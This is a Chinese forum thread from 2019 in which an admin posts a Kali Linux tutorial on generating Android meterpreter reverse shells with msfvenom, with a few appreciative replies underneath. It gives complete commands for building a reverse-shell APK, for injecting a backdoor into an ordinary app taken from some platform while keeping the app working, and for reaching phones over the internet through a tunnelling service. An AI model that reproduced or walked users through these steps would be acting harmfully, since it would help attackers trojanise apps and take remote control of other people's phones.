admin 发表于 2019-7-16 23:13:15

kali下安卓shell填坑

一:生成的Shell得不到反弹
常见问题
导致此问题出现最大的原因是网络的问题,手机和kali不在同一网段内。比如手机的ip地址是192.168.1.2kali的ip地址为192.168.1.4也就是说,手机和kali在同一网段192.168.1.1/24
怎么设置:
kali下虚拟机的上网方式默认为NAT模式,我们设置为桥接模式即可!


或者我们的kali连接无线网络,也可以的!


比如该实例中,手机的ip是192.168.0.189 kali的ip是192.168.0.106(记住kali的ip地址,要用!)
生成Shell


msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > kali.apk


这样我们就生成了一个内网版的安卓Shell!
参数说明:
LHOST :kali的ip地址(不是手机的)
LPORT :kali的内网端口(可以自定义)
kali.apk : 生成Shell的名字

给正常APP添加后门

ps:此方法只适用于没有加壳的app
首先,我们在某平台获取某app
执行下面命令

msfvenom -x sx.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -o aa.apk

可以看到,和前面的命令相比较,多了一个-x参数。后面跟要添加后门的app名字即可!

当我们运行该APP时,成功得到反弹!


app也正常运行


外网Shell
以上学习仅仅适合内网的渗透测试,那么我们看看如何使用外网的连接!
以前说过,如何利用花生壳制作外网shell的学习,今天我们来看看利用ngrok进行的渗透测试!
我们新增一个TCP协议

如果提示端口占用,试试查看可用端口
然后点击开通
然后获取客户端执行./sunny clientid你的id(具体移步文章 kali制作外网shell)
生成外网Shell
生成外网Shell,其实很重的一点就是我们要知道外网的ip地址。很简单,我们ping下分配给我们的域名即可。

如图,我们得到了我们的外网ip,端口在开通tcp协议时,我们就得到了。直接生成Shell即可。
需要注意的是,我们在配置msf时,填写的参数是我们内网的端口和ip,而不是我们公网的!
切换到4G,成功得到shell



mjhopen 发表于 2019-7-18 08:50:44

谢谢分享,学习了

libo 发表于 2019-7-17 08:34:55

讲的很详细!谢谢分享!:kaixin:

priess1314 发表于 2019-7-17 21:11:32

{:9_311:}
不错!支持下!

admin 发表于 2019-7-18 14:10:35

mjhopen 发表于 2019-7-18 00:50
谢谢分享,学习了

共同学习!!!:shengqi:

火焰之剑 发表于 2019-8-5 15:08:59

共同学习!!!

admin 发表于 2019-8-9 08:42:27

火焰之剑 发表于 2019-8-5 07:08
共同学习!!!

666:kaixin:

爱的魔法师688 发表于 2019-9-27 09:15:33

不错,很好可以学习一下

Mr.xiaohui 发表于 2019-9-28 00:32:31

开启payload的命令我都忘了   {:2_25:}

Mr.xiaohui 发表于 2019-9-28 02:09:48

我用在某平台下载的apk,为什么不加壳加码为什么会报错   制作失败?
页: [1] 2
查看完整版本: kali下安卓shell填坑